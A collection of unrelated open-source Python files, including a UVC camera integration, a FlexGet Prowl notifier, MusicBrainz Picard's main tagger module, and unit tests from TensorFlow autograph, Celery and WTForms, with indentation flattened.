caminfo['username'] = 'ubnt'
camera = None
for addr in addrs:
try:
camera = client_cls(
addr, caminfo['username'], self._password)
camera.login()
_LOGGER.debug("Logged into UVC camera %(name)s via %(addr)s",
dict(name=self._name, addr=addr))
self._connect_addr = addr
break
except socket.error:
pass
except uvc_camera.CameraConnectError:
pass
except uvc_camera.CameraAuthError:
pass
if not self._connect_addr:
_LOGGER.error("Unable to login to camera")
return None
self._camera = camera
return True
def camera_image(self):
"""Return the image of this camera."""
from uvcclient import camera as uvc_camera
if not self._camera:
if not self._login():
return
def _get_image(retry=True):
try:
return self._camera.get_snapshot()
except uvc_camera.CameraConnectError:
_LOGGER.error("Unable to contact camera")
except uvc_camera.CameraAuthError:
if retry:
self._login()
return _get_image(retry=False)
_LOGGER.error(
"Unable to log into camera, unable to get snapshot")
raise
return _get_image()
def set_motion_detection(self, mode):
"""Set motion detection on or off."""
from uvcclient.nvr import NvrError
if mode is True:
set_mode = 'motion'
else:
set_mode = 'none'
try:
self._nvr.set_recordmode(self._uuid, set_mode)
self._motion_status = mode
except NvrError as err:
_LOGGER.error("Unable to set recordmode to %s", set_mode)
_LOGGER.debug(err)
def enable_motion_detection(self):
"""Enable motion detection in camera."""
self.set_motion_detection(True)
def disable_motion_detection(self):
"""Disable motion detection in camera."""
self.set_motion_detection(False)
|
Ibtiss4m/sendprismApp | refs/heads/master | sendprism/contrib/sites/__init__.py | 1349 | # -*- coding: utf-8 -*- |
sdn-ixp/iSDX | refs/heads/master | visualization/dockers/redis-service/pub-sub/sub.py | 3 | from settings import r
import sys
if __name__ == '__main__':
channel = sys.argv[1]
pubsub = r.pubsub()
pubsub.subscribe(channel)
print 'Listening to {channel}'.format(**locals())
while True:
for item in pubsub.listen():
print item['data']
|
allenlavoie/tensorflow | refs/heads/master | tensorflow/contrib/autograph/converters/call_trees_test.py | 1 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for call_trees module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.autograph.converters import call_trees
from tensorflow.contrib.autograph.converters import converter_test_base
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class CallTreesTest(converter_test_base.TestCase):
def test_basic(self):
def test_fn_1(_):
raise ValueError('This should not be called in the compiled verison.')
def renamed_test_fn_1(a):
return a + 1
def test_fn_2(a):
return test_fn_1(a) + 1
node = self.parse_and_analyze(test_fn_2, {'test_fn_1': test_fn_1})
node = call_trees.transform(node, self.ctx, (), ())
with self.compiled(node) as result:
# Only test_fn_2 is transformed, so we'll insert renamed_test_fn_1
# manually.
result.renamed_test_fn_1 = renamed_test_fn_1
self.assertEquals(3, result.test_fn_2(1))
def test_dynamic_function(self):
def test_fn_1():
raise ValueError('This should be masked by the mock.')
def test_fn_2(f):
return f() + 3
node = self.parse_and_analyze(test_fn_2, {})
node = call_trees.transform(node, self.ctx, (), ())
with self.compiled(node) as result:
# 10 = 7 (from the mock) + 3 (from test_fn_2)
self.assertEquals(10, result.test_fn_2(test_fn_1))
def test_simple_methods(self):
class TestClass(object):
def test_fn_1(self, a):
return a + 1
def test_fn_2(self, a):
return self.test_fn_1(a) + 1
node = self.parse_and_analyze(
TestClass.test_fn_2, {'TestClass': TestClass},
namer=converter_test_base.FakeNoRenameNamer(),
arg_types={'self': (TestClass.__name__, TestClass)})
node = call_trees.transform(node, self.ctx, (), ())
with self.compiled(node) as result:
tc = TestClass()
self.assertEquals(3, result.test_fn_2(tc, 1))
def test_py_func_wrap_no_retval(self):
def test_fn(a):
setattr(a, 'foo', 'bar')
node = self.parse_and_analyze(test_fn, {'setattr': setattr})
node = call_trees.transform(node, self.ctx, (), ())
with self.compiled(node) as result:
with self.test_session() as sess:
# The function has no return value, so we do some tricks to grab the
# generated py_func node and ensure its effect only happens at graph
# execution.
class Dummy(object):
pass
a = Dummy()
result.test_fn(a)
self.assertFalse(hasattr(a, 'foo'))
sess.run(sess.graph.get_operations()[0])
self.assertEquals('bar', a.foo)
def test_py_func_wrap_known_function(self):
def test_fn():
return np.random.binomial(2, 0.5)
node = self.parse_and_analyze(test_fn, {'np': np})
node = call_trees.transform(node, self.ctx, (), ())
with self.compiled(node, dtypes.int64) as result:
result.np = np
with self.test_session() as sess:
self.assertTrue(isinstance(result.test_fn(), ops.Tensor))
self.assertIn(sess.run(result.test_fn()), (0, 1, 2))
def test_uncompiled_modules(self):
def test_fn(a):
a = math_ops.multiply(a, constant_op.constant(2))
a = math_ops.add(a, constant_op.constant(1))
return a
node = self.parse_and_analyze(test_fn, {
'math_ops': math_ops,
'constant_op': constant_op
})
node = call_trees.transform(node, self.ctx,
set(((math_ops.__name__,),
(constant_op.__name__,))), ())
with self.compiled(node) as result:
result.math_ops = math_ops
result.constant_op = constant_op
with self.test_session() as sess:
# Not renamed, because the converter doesn't rename the definition
# itself (the caller is responsible for that).
result_tensor = result.test_fn(constant_op.constant(1))
self.assertEquals(3, sess.run(result_tensor))
if __name__ == '__main__':
test.main()
|
JorisDeRieck/Flexget | refs/heads/develop | flexget/components/notify/notifiers/prowl.py | 4 | from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import logging
import xml.etree.ElementTree as ET
from flexget import plugin
from flexget.config_schema import one_or_more
from flexget.event import event
from flexget.plugin import PluginWarning
from flexget.utils.requests import Session as RequestSession, TimedLimiter
from requests.exceptions import RequestException
plugin_name = 'prowl'
log = logging.getLogger(plugin_name)
PROWL_URL = 'https://api.prowlapp.com/publicapi/add'
requests = RequestSession(max_retries=3)
requests.add_domain_limiter(TimedLimiter('prowlapp.com', '5 seconds'))
class ProwlNotifier(object):
"""
Send prowl notifications
Example::
notify:
entries:
via:
- prowl:
api_key: xxxxxxx
[application: application name, default FlexGet]
[event: event title, default New Release]
[priority: -2 - 2 (2 = highest), default 0]
[description: notification to send]
"""
schema = {
'type': 'object',
'properties': {
'api_key': one_or_more({'type': 'string'}),
'application': {'type': 'string', 'default': 'FlexGet'},
'priority': {'type': 'integer', 'minimum': -2, 'maximum': 2},
'url': {'type': 'string'},
'provider_key': {'type': 'string'},
},
'required': ['api_key'],
'additionalProperties': False,
}
def notify(self, title, message, config):
"""
Send a Prowl notification
"""
notification = {
'application': config.get('application'),
'event': title,
'description': message,
'url': config.get('url'),
'priority': config.get('priority'),
'providerkey': config.get('provider_key'),
}
if isinstance(config['api_key'], list):
config['api_key'] = [config['api_key']]
notification['apikey'] = config['api_key']
try:
response = requests.post(PROWL_URL, data=notification)
except RequestException as e:
raise PluginWarning(repr(e))
request_status = ET.fromstring(response.content)
error = request_status.find('error')
if error is not None:
raise PluginWarning(error.text)
else:
success = request_status.find('success').attrib
log.debug(
'prowl notification sent. Notifications remaining until next reset: %s. '
'Next reset will occur in %s minutes',
success['remaining'],
success['resetdate'],
)
@event('plugin.register')
def register_plugin():
plugin.register(ProwlNotifier, plugin_name, api_ver=2, interfaces=['notifiers'])
|
Freso/picard | refs/heads/master | picard/tagger.py | 2 | # -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
# Copyright (C) 2004 Robert Kaye
# Copyright (C) 2006 Lukáš Lalinský
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from __future__ import print_function
import sip
sip.setapi("QString", 2)
sip.setapi("QVariant", 2)
from PyQt4 import QtGui, QtCore
import argparse
import os.path
import platform
import re
import shutil
import signal
import sys
from functools import partial
from itertools import chain
# A "fix" for http://python.org/sf/1438480
def _patched_shutil_copystat(src, dst):
try:
_orig_shutil_copystat(src, dst)
except OSError:
pass
_orig_shutil_copystat = shutil.copystat
shutil.copystat = _patched_shutil_copystat
import picard.resources
import picard.plugins
from picard.i18n import setup_gettext
from picard import (PICARD_APP_NAME, PICARD_ORG_NAME,
PICARD_FANCY_VERSION_STR, __version__,
log, acoustid, config)
from picard.album import Album, NatAlbum
from picard.browser.browser import BrowserIntegration
from picard.browser.filelookup import FileLookup
from picard.cluster import Cluster, ClusterList, UnmatchedFiles
from picard.const import USER_DIR, USER_PLUGIN_DIR
from picard.dataobj import DataObject
from picard.disc import Disc
from picard.file import File
from picard.formats import open as open_file
from picard.track import Track, NonAlbumTrack
from picard.releasegroup import ReleaseGroup
from picard.collection import load_user_collections
from picard.ui.mainwindow import MainWindow
from picard.ui.itemviews import BaseTreeView
from picard.plugin import PluginManager
from picard.acoustidmanager import AcoustIDManager
from picard.config_upgrade import upgrade_config
from picard.util import (
decode_filename,
encode_filename,
thread,
mbid_validate,
check_io_encoding,
uniqify,
is_hidden,
versions,
)
from picard.webservice import XmlWebService
from picard.ui.searchdialog import (
TrackSearchDialog,
AlbumSearchDialog,
ArtistSearchDialog
)
class Tagger(QtGui.QApplication):
tagger_stats_changed = QtCore.pyqtSignal()
listen_port_changed = QtCore.pyqtSignal(int)
cluster_added = QtCore.pyqtSignal(Cluster)
cluster_removed = QtCore.pyqtSignal(Cluster)
album_added = QtCore.pyqtSignal(Album)
album_removed = QtCore.pyqtSignal(Album)
__instance = None
def __init__(self, picard_args, unparsed_args, localedir, autoupdate):
# Set the WM_CLASS to 'MusicBrainz-Picard' so desktop environments
# can use it to look up the app
QtGui.QApplication.__init__(self, ['MusicBrainz-Picard'] + unparsed_args)
self.__class__.__instance = self
config._setup(self)
self._cmdline_files = picard_args.FILE
self._autoupdate = autoupdate
self._debug = False
# FIXME: Figure out what's wrong with QThreadPool.globalInstance().
# It's a valid reference, but its start() method doesn't work.
self.thread_pool = QtCore.QThreadPool(self)
# Use a separate thread pool for file saving, with a thread count of 1,
# to avoid race conditions in File._save_and_rename.
self.save_thread_pool = QtCore.QThreadPool(self)
self.save_thread_pool.setMaxThreadCount(1)
if not sys.platform == "win32":
# Set up signal handling
# It's not possible to call all available functions from signal
# handlers, therefore we need to set up a QSocketNotifier to listen
# on a socket. Sending data through a socket can be done in a
# signal handler, so we use the socket to notify the application of
# the signal.
# This code is adopted from
# https://qt-project.org/doc/qt-4.8/unix-signals.html
# To not make the socket module a requirement for the Windows
# installer, import it here and not globally
import socket
self.signalfd = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM, 0)
self.signalnotifier = QtCore.QSocketNotifier(self.signalfd[1].fileno(),
QtCore.QSocketNotifier.Read, self)
self.signalnotifier.activated.connect(self.sighandler)
signal.signal(signal.SIGHUP, self.signal)
signal.signal(signal.SIGINT, self.signal)
signal.signal(signal.SIGTERM, self.signal)
# Setup logging
self.debug(picard_args.debug or "PICARD_DEBUG" in os.environ)
log.debug("Starting Picard from %r", os.path.abspath(__file__))
log.debug("Platform: %s %s %s", platform.platform(),
platform.python_implementation(), platform.python_version())
log.debug("Versions: %s", versions.as_string())
log.debug("Configuration file path: %r", config.config.fileName())
# TODO remove this before the final release
if sys.platform == "win32":
olduserdir = "~\\Local Settings\\Application Data\\MusicBrainz Picard"
else:
olduserdir = "~/.picard"
olduserdir = os.path.expanduser(olduserdir)
if os.path.isdir(olduserdir):
log.info("Moving %r to %r", olduserdir, USER_DIR)
try:
shutil.move(olduserdir, USER_DIR)
except:
pass
log.debug("User directory: %r", os.path.abspath(USER_DIR))
# for compatibility with pre-1.3 plugins
QtCore.QObject.tagger = self
QtCore.QObject.config = config
QtCore.QObject.log = log
check_io_encoding()
# Must be before config upgrade because upgrade dialogs need to be
# translated
setup_gettext(localedir, config.setting["ui_language"], log.debug)
upgrade_config()
self.xmlws = XmlWebService()
load_user_collections()
# Initialize fingerprinting
self._acoustid = acoustid.AcoustIDClient()
self._acoustid.init()
# Load plugins
self.pluginmanager = PluginManager()
if hasattr(sys, "frozen"):
self.pluginmanager.load_plugindir(os.path.join(os.path.dirname(sys.argv[0]), "plugins"))
else:
mydir = os.path.dirname(os.path.abspath(__file__))
self.pluginmanager.load_plugindir(os.path.join(mydir, "plugins"))
self.pluginmanager.load_plugindir(os.path.join(mydir, os.pardir, "contrib", "plugins"))
if not os.path.exists(USER_PLUGIN_DIR):
os.makedirs(USER_PLUGIN_DIR)
self.pluginmanager.load_plugindir(USER_PLUGIN_DIR)
self.pluginmanager.query_available_plugins()
self.acoustidmanager = AcoustIDManager()
self.browser_integration = BrowserIntegration()
self.files = {}
self.clusters = ClusterList()
self.albums = {}
self.release_groups = {}
self.mbid_redirects = {}
self.unmatched_files = UnmatchedFiles()
self.nats = None
self.window = MainWindow()
self.exit_cleanup = []
self.stopping = False
def register_cleanup(self, func):
self.exit_cleanup.append(func)
def run_cleanup(self):
for f in self.exit_cleanup:
f()
def debug(self, debug):
if self._debug == debug:
return
if debug:
log.log_levels = log.log_levels | log.LOG_DEBUG
log.debug("Debug mode on")
else:
log.debug("Debug mode off")
log.log_levels = log.log_levels & ~log.LOG_DEBUG
self._debug = debug
def move_files_to_album(self, files, albumid=None, album=None):
"""Move `files` to tracks on album `albumid`."""
if album is None:
album = self.load_album(albumid)
if album.loaded:
album.match_files(files)
else:
for file in list(files):
file.move(album.unmatched_files)
def move_file_to_album(self, file, albumid):
"""Move `file` to a track on album `albumid`."""
self.move_files_to_album([file], albumid)
def move_file_to_track(self, file, albumid, recordingid):
"""Move `file` to recording `recordingid` on album `albumid`."""
album = self.load_album(albumid)
file.move(album.unmatched_files)
album.run_when_loaded(partial(album.match_file, file, recordingid))
def create_nats(self):
if self.nats is None:
self.nats = NatAlbum()
self.albums["NATS"] = self.nats
self.album_added.emit(self.nats)
return self.nats
def move_file_to_nat(self, file, recordingid, node=None):
self.create_nats()
file.move(self.nats.unmatched_files)
nat = self.load_nat(recordingid, node=node)
nat.run_when_loaded(partial(file.move, nat))
if nat.loaded:
self.nats.update()
def exit(self):
log.debug("Picard stopping")
self.stopping = True
self._acoustid.done()
self.thread_pool.waitForDone()
self.save_thread_pool.waitForDone()
self.browser_integration.stop()
self.xmlws.stop()
for f in self.exit_cleanup:
f()
QtCore.QCoreApplication.processEvents()
def _run_init(self):
if self._cmdline_files:
files = []
for file in self._cmdline_files:
if os.path.isdir(file):
self.add_directory(decode_filename(file))
else:
files.append(decode_filename(file))
if files:
self.add_files(files)
del self._cmdline_files
def run(self):
if config.setting["browser_integration"]:
self.browser_integration.start()
self.window.show()
QtCore.QTimer.singleShot(0, self._run_init)
res = self.exec_()
self.exit()
return res
def event(self, event):
if isinstance(event, thread.ProxyToMainEvent):
event.run()
elif event.type() == QtCore.QEvent.FileOpen:
f = str(event.file())
self.add_files([f])
# We should just return True here, except that seems to
# cause the event's sender to get a -9874 error, so
# apparently there's some magic inside QFileOpenEvent...
return 1
return QtGui.QApplication.event(self, event)
def _file_loaded(self, file, target=None):
if file is not None and not file.has_error():
recordingid = file.metadata.getall('musicbrainz_recordingid')[0] \
if 'musicbrainz_recordingid' in file.metadata else ''
if target is not None:
self.move_files([file], target)
elif not config.setting["ignore_file_mbids"]:
albumid = file.metadata.getall('musicbrainz_albumid')[0] \
if 'musicbrainz_albumid' in file.metadata else ''
if mbid_validate(albumid):
if mbid_validate(recordingid):
self.move_file_to_track(file, albumid, recordingid)
else:
self.move_file_to_album(file, albumid)
elif mbid_validate(recordingid):
self.move_file_to_nat(file, recordingid)
elif config.setting['analyze_new_files'] and file.can_analyze():
self.analyze([file])
elif config.setting['analyze_new_files'] and file.can_analyze():
self.analyze([file])
def move_files(self, files, target):
if isinstance(target, (Track, Cluster)):
for file in files:
file.move(target)
elif isinstance(target, File):
for file in files:
file.move(target.parent)
elif isinstance(target, Album):
self.move_files_to_album(files, album=target)
elif isinstance(target, ClusterList):
self.cluster(files)
def add_files(self, filenames, target=None):
"""Add files to the tagger."""
ignoreregex = None
pattern = config.setting['ignore_regex']
if pattern:
ignoreregex = re.compile(pattern)
ignore_hidden = config.setting["ignore_hidden_files"]
new_files = []
for filename in filenames:
filename = os.path.normpath(os.path.realpath(filename))
if ignore_hidden and is_hidden(filename):
log.debug("File ignored (hidden): %r" % (filename))
continue
if ignoreregex is not None and ignoreregex.search(filename):
log.info("File ignored (matching %r): %r" % (pattern, filename))
continue
if filename not in self.files:
file = open_file(filename)
if file:
self.files[filename] = file
new_files.append(file)
if new_files:
log.debug("Adding files %r", new_files)
new_files.sort(key=lambda x: x.filename)
if target is None or target is self.unmatched_files:
self.unmatched_files.add_files(new_files)
target = None
for file in new_files:
file.load(partial(self._file_loaded, target=target))
def add_directory(self, path):
if config.setting['recursively_add_files']:
self._add_directory_recursive(path)
else:
self._add_directory_non_recursive(path)
def _add_directory_recursive(self, path):
ignore_hidden = config.setting["ignore_hidden_files"]
walk = os.walk(unicode(path))
def get_files():
try:
root, dirs, files = next(walk)
if ignore_hidden:
dirs[:] = [d for d in dirs if not is_hidden(os.path.join(root, d))]
except StopIteration:
return None
else:
number_of_files = len(files)
if number_of_files:
mparms = {
'count': number_of_files,
'directory': root,
}
log.debug("Adding %(count)d files from '%(directory)r'" %
mparms)
self.window.set_statusbar_message(
ungettext(
"Adding %(count)d file from '%(directory)s' ...",
"Adding %(count)d files from '%(directory)s' ...",
number_of_files),
mparms,
translate=None,
echo=None
)
return (os.path.join(root, f) for f in files)
def process(result=None, error=None):
if result:
if error is None:
self.add_files(result)
thread.run_task(get_files, process)
process(True, False)
def _add_directory_non_recursive(self, path):
files = []
for f in os.listdir(path):
listing = os.path.join(path, f)
if os.path.isfile(listing):
files.append(listing)
number_of_files = len(files)
if number_of_files:
mparms = {
'count': number_of_files,
'directory': path,
}
log.debug("Adding %(count)d files from '%(directory)r'" %
mparms)
self.window.set_statusbar_message(
ungettext(
"Adding %(count)d file from '%(directory)s' ...",
"Adding %(count)d files from '%(directory)s' ...",
number_of_files),
mparms,
translate=None,
echo=None
)
# Function call only if files exist
self.add_files(files)
def get_file_lookup(self):
"""Return a FileLookup object."""
return FileLookup(self, config.setting["server_host"],
config.setting["server_port"],
self.browser_integration.port)
def copy_files(self, objects):
mimeData = QtCore.QMimeData()
mimeData.setUrls([QtCore.QUrl.fromLocalFile(f.filename) for f in (self.get_files_from_objects(objects))])
self.clipboard().setMimeData(mimeData)
def paste_files(self, target):
mimeData = self.clipboard().mimeData()
if mimeData.hasUrls():
BaseTreeView.drop_urls(mimeData.urls(), target)
def search(self, text, type, adv=False):
"""Search on the MusicBrainz website."""
lookup = self.get_file_lookup()
if config.setting["builtin_search"]:
if type == "track" and not lookup.mbidLookup(text, 'recording'):
dialog = TrackSearchDialog(self.window)
dialog.search(text)
dialog.exec_()
elif type == "album" and not lookup.mbidLookup(text, 'release'):
dialog = AlbumSearchDialog(self.window)
dialog.search(text)
dialog.exec_()
elif type == "artist" and not lookup.mbidLookup(text, 'artist'):
dialog = ArtistSearchDialog(self.window)
dialog.search(text)
dialog.exec_()
else:
getattr(lookup, type + "Search")(text, adv)
def collection_lookup(self):
"""Lookup the users collections on the MusicBrainz website."""
lookup = self.get_file_lookup()
lookup.collectionLookup(config.persist["oauth_username"])
def browser_lookup(self, item):
"""Lookup the object's metadata on the MusicBrainz website."""
lookup = self.get_file_lookup()
metadata = item.metadata
# Only lookup via MB IDs if matched to a DataObject; otherwise ignore and use metadata details
if isinstance(item, DataObject):
itemid = item.id
if isinstance(item, Track):
lookup.recordingLookup(itemid)
elif isinstance(item, Album):
lookup.albumLookup(itemid)
else:
lookup.tagLookup(
metadata["albumartist"] if item.is_album_like() else metadata["artist"],
metadata["album"],
metadata["title"],
metadata["tracknumber"],
'' if item.is_album_like() else str(metadata.length),
item.filename if isinstance(item, File) else '')
def get_files_from_objects(self, objects, save=False):
"""Return list of files from list of albums, clusters, tracks or files."""
return uniqify(chain(*[obj.iterfiles(save) for obj in objects]))
def save(self, objects):
"""Save the specified objects."""
files = self.get_files_from_objects(objects, save=True)
for file in files:
file.save()
def load_album(self, id, discid=None):
id = self.mbid_redirects.get(id, id)
album = self.albums.get(id)
if album:
log.debug("Album %s already loaded.", id)
return album
album = Album(id, discid=discid)
self.albums[id] = album
self.album_added.emit(album)
album.load()
return album
def load_nat(self, id, node=None):
self.create_nats()
nat = self.get_nat_by_id(id)
if nat:
log.debug("NAT %s already loaded.", id)
return nat
nat = NonAlbumTrack(id)
self.nats.tracks.append(nat)
self.nats.update(True)
if node:
nat._parse_recording(node)
else:
nat.load()
return nat
def get_nat_by_id(self, id):
if self.nats is not None:
for nat in self.nats.tracks:
if nat.id == id:
return nat
def get_release_group_by_id(self, id):
return self.release_groups.setdefault(id, ReleaseGroup(id))
def remove_files(self, files, from_parent=True):
"""Remove files from the tagger."""
for file in files:
if file.filename in self.files:
file.clear_lookup_task()
self._acoustid.stop_analyze(file)
del self.files[file.filename]
file.remove(from_parent)
def remove_album(self, album):
"""Remove the specified album."""
log.debug("Removing %r", album)
album.stop_loading()
self.remove_files(self.get_files_from_objects([album]))
del self.albums[album.id]
if album.release_group:
album.release_group.remove_album(album.id)
if album == self.nats:
self.nats = None
self.album_removed.emit(album)
def remove_cluster(self, cluster):
"""Remove the specified cluster."""
if not cluster.special:
log.debug("Removing %r", cluster)
files = list(cluster.files)
cluster.files = []
cluster.clear_lookup_task()
self.remove_files(files, from_parent=False)
self.clusters.remove(cluster)
self.cluster_removed.emit(cluster)
def remove(self, objects):
"""Remove the specified objects."""
files = []
for obj in objects:
if isinstance(obj, File):
files.append(obj)
elif isinstance(obj, Track):
files.extend(obj.linked_files)
elif isinstance(obj, Album):
self.window.set_statusbar_message(
N_("Removing album %(id)s: %(artist)s - %(album)s"),
{
'id': obj.id,
'artist': obj.metadata['albumartist'],
'album': obj.metadata['album']
}
)
self.remove_album(obj)
elif isinstance(obj, Cluster):
self.remove_cluster(obj)
if files:
self.remove_files(files)
def _lookup_disc(self, disc, result=None, error=None):
self.restore_cursor()
if error is not None:
QtGui.QMessageBox.critical(self.window, _(u"CD Lookup Error"),
_(u"Error while reading CD:\n\n%s") % error)
else:
disc.lookup()
def lookup_cd(self, action):
"""Reads CD from the selected drive and tries to lookup the DiscID on MusicBrainz."""
if isinstance(action, QtGui.QAction):
device = unicode(action.text())
elif config.setting["cd_lookup_device"] != '':
device = config.setting["cd_lookup_device"].split(",", 1)[0]
else:
# rely on python-discid auto detection
device = None
disc = Disc()
self.set_wait_cursor()
thread.run_task(
partial(disc.read, encode_filename(device)),
partial(self._lookup_disc, disc))
@property
def use_acoustid(self):
return config.setting["fingerprinting_system"] == "acoustid"
def analyze(self, objs):
"""Analyze the file(s)."""
files = self.get_files_from_objects(objs)
for file in files:
file.set_pending()
if self.use_acoustid:
self._acoustid.analyze(file, partial(file._lookup_finished, 'acoustid'))
# =======================================================================
# Metadata-based lookups
# =======================================================================
def autotag(self, objects):
for obj in objects:
if obj.can_autotag():
obj.lookup_metadata()
# =======================================================================
# Clusters
# =======================================================================
def cluster(self, objs):
"""Group files with similar metadata to 'clusters'."""
log.debug("Clustering %r", objs)
if len(objs) <= 1 or self.unmatched_files in objs:
files = list(self.unmatched_files.files)
else:
files = self.get_files_from_objects(objs)
fcmp = lambda a, b: (
cmp(a.discnumber, b.discnumber) or
cmp(a.tracknumber, b.tracknumber) or
cmp(a.base_filename, b.base_filename))
for name, artist, files in Cluster.cluster(files, 1.0):
QtCore.QCoreApplication.processEvents()
cluster = self.load_cluster(name, artist)
for file in sorted(files, fcmp):
file.move(cluster)
def load_cluster(self, name, artist):
for cluster in self.clusters:
cm = cluster.metadata
if name == cm["album"] and artist == cm["albumartist"]:
return cluster
cluster = Cluster(name, artist)
self.clusters.append(cluster)
self.cluster_added.emit(cluster)
return cluster
# =======================================================================
# Utils
# =======================================================================
def set_wait_cursor(self):
"""Sets the waiting cursor."""
QtGui.QApplication.setOverrideCursor(
QtGui.QCursor(QtCore.Qt.WaitCursor))
def restore_cursor(self):
"""Restores the cursor set by ``set_wait_cursor``."""
QtGui.QApplication.restoreOverrideCursor()
def refresh(self, objs):
for obj in objs:
if obj.can_refresh():
obj.load(priority=True, refresh=True)
def bring_tagger_front(self):
self.window.setWindowState(self.window.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
self.window.raise_()
self.window.activateWindow()
@classmethod
def instance(cls):
return cls.__instance
def signal(self, signum, frame):
log.debug("signal %i received", signum)
# Send a notification about a received signal from the signal handler
# to Qt.
self.signalfd[0].sendall("a")
def sighandler(self):
self.signalnotifier.setEnabled(False)
self.exit()
self.quit()
self.signalnotifier.setEnabled(True)
def version():
print("%s %s %s" % (PICARD_ORG_NAME, PICARD_APP_NAME, PICARD_FANCY_VERSION_STR))
def longversion():
print(versions.as_string())
def process_picard_args():
parser = argparse.ArgumentParser(
epilog="If one of the filenames begins with a hyphen, use -- to separate the options from the filenames."
)
parser.add_argument("-d", "--debug", action='store_true',
help="enable debug-level logging")
parser.add_argument('-v', '--version', action='store_true',
help="display version information and exit")
parser.add_argument("-V", "--long-version", action='store_true',
help="display long version information and exit")
parser.add_argument('FILE', nargs='*')
picard_args, unparsed_args = parser.parse_known_args()
return picard_args, unparsed_args
def main(localedir=None, autoupdate=True):
# Some libs (ie. Phonon) require those to be set
QtGui.QApplication.setApplicationName(PICARD_APP_NAME)
QtGui.QApplication.setOrganizationName(PICARD_ORG_NAME)
signal.signal(signal.SIGINT, signal.SIG_DFL)
picard_args, unparsed_args = process_picard_args()
if picard_args.version:
return version()
if picard_args.long_version:
return longversion()
tagger = Tagger(picard_args, unparsed_args, localedir, autoupdate)
tagger.startTimer(1000)
sys.exit(tagger.run())
|
akarki15/mozillians | refs/heads/master | vendor-local/lib/python/celery/tests/test_bin/test_celeryev.py | 14 | from __future__ import absolute_import
from nose import SkipTest
from celery.app import app_or_default
from celery.bin import celeryev
from celery.tests.utils import Case, patch
class MockCommand(object):
executed = []
def execute_from_commandline(self, **kwargs):
self.executed.append(True)
def proctitle(prog, info=None):
proctitle.last = (prog, info)
proctitle.last = ()
class test_EvCommand(Case):
def setUp(self):
self.app = app_or_default()
self.ev = celeryev.EvCommand(app=self.app)
@patch("celery.events.dumper", "evdump", lambda **kw: "me dumper, you?")
@patch("celery.platforms", "set_process_title", proctitle)
def test_run_dump(self):
self.assertEqual(self.ev.run(dump=True), "me dumper, you?")
self.assertIn("celeryev:dump", proctitle.last[0])
def test_run_top(self):
try:
import curses # noqa
except ImportError:
raise SkipTest("curses monitor requires curses")
@patch("celery.events.cursesmon", "evtop", lambda **kw: "me top, you?")
@patch("celery.platforms", "set_process_title", proctitle)
def _inner():
self.assertEqual(self.ev.run(), "me top, you?")
self.assertIn("celeryev:top", proctitle.last[0])
return _inner()
@patch("celery.events.snapshot", "evcam", lambda *a, **k: (a, k))
@patch("celery.platforms", "set_process_title", proctitle)
def test_run_cam(self):
a, kw = self.ev.run(camera="foo.bar.baz", logfile="logfile")
self.assertEqual(a[0], "foo.bar.baz")
self.assertEqual(kw["freq"], 1.0)
self.assertIsNone(kw["maxrate"])
self.assertEqual(kw["loglevel"], "INFO")
self.assertEqual(kw["logfile"], "logfile")
self.assertIn("celeryev:cam", proctitle.last[0])
@patch("celery.bin.celeryev", "EvCommand", MockCommand)
def test_main(self):
MockCommand.executed = []
celeryev.main()
self.assertTrue(MockCommand.executed)
|
hynnet/hiwifi-openwrt-HC5661-HC5761 | refs/heads/master | staging_dir/host/lib/python2.7/lib2to3/tests/data/different_encoding.py | 295 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
print u'ßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþÿÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞ'
def f(x):
print '%s\t-> α(%2i):%s β(%s)'
|
mabushadi/dpxdt | refs/heads/master | dependencies/WTForms/tests/validators.py | 2 | #!/usr/bin/env python
from unittest import TestCase
from wtforms.compat import text_type
from wtforms.validators import (
StopValidation, ValidationError, email, equal_to,
ip_address, length, required, optional, regexp,
url, NumberRange, AnyOf, NoneOf, mac_address, UUID
)
from functools import partial
class DummyTranslations(object):
def gettext(self, string):
return string
def ngettext(self, singular, plural, n):
if n == 1:
return singular
return plural
class DummyForm(dict):
pass
class DummyField(object):
_translations = DummyTranslations()
def __init__(self, data, errors=(), raw_data=None):
self.data = data
self.errors = list(errors)
self.raw_data = raw_data
def gettext(self, string):
return self._translations.gettext(string)
def ngettext(self, singular, plural, n):
return self._translations.ngettext(singular, plural, n)
def grab_error_message(callable, form, field):
try:
callable(form, field)
except ValidationError as e:
return e.args[0]
class ValidatorsTest(TestCase):
def setUp(self):
self.form = DummyForm()
def test_email(self):
self.assertEqual(email()(self.form, DummyField('foo@bar.dk')), None)
self.assertEqual(email()(self.form, DummyField('123@bar.dk')), None)
self.assertEqual(email()(self.form, DummyField('foo@456.dk')), None)
self.assertEqual(email()(self.form, DummyField('foo@bar456.info')), None)
self.assertRaises(ValidationError, email(), self.form, DummyField(None))
self.assertRaises(ValidationError, email(), self.form, DummyField(''))
self.assertRaises(ValidationError, email(), self.form, DummyField(' '))
